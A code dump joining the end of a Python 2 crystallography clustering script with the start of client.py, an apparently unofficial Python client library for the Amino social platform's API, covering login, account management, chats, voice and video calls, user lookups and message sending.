print_table(results['pCC_selection'])
print '\nxscale_isocluster table from most populated cluster\n'
print_table(results['iso-cluster'])
print '\n\n'
if len(proc.xscale_file_list) > 200:
hkl_file_cell = os.path.join(mm.subadm, 'Cell_Select.LP')
if os.path.isfile(hkl_file_cell):
cell_hist = Cell(hkl_file_cell)
cell_hist.cell_histogram()
else:
import scipy.cluster.hierarchy as sch
fig = plt.figure()
dn = sch.dendrogram(results['hclust_matrix'], p=10, labels=results['dendro_labels'], truncate_mode='level')
fig.savefig('cell-dendrogram.png', dpi=300)
except (KeyError, TypeError) as e:
print "xscaleing had error, check \n"
return
if __name__ == '__main__':
main()
|
client.py
|
import json
import base64
from zipfile import ZipFile
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
self.session = requests.Session()
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
def parse_headers(self, data = None):
if data:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType])
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def start_video(self, comId: str, chatId: str, path: str, title: str, background: BinaryIO, duration: int):
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 1,
"id": "10335106"
},
"t": 112
}
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"channelType": 5,
"id": "10335436"
},
"t": 108
}
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"playlist": {
"currentItemIndex": 0,
"currentItemStatus": 1,
"items": [{
"author": None,
"duration": duration,
"isDone": False,
"mediaList": [[100, self.upload_media(background, "image"), None]],
"title": title,
"type": 1,
"url": f"file://{path}"
}]
},
"id": "3423239"
},
"t": 120
}
self.send(data)
sleep(2)
data["o"]["playlist"]["currentItemStatus"] = 2
data["o"]["playlist"]["items"][0]["isDone"] = True
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.run_amino_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_amino_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.run_amino_socket()
return response.status_code
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = self.session.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = self.session.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
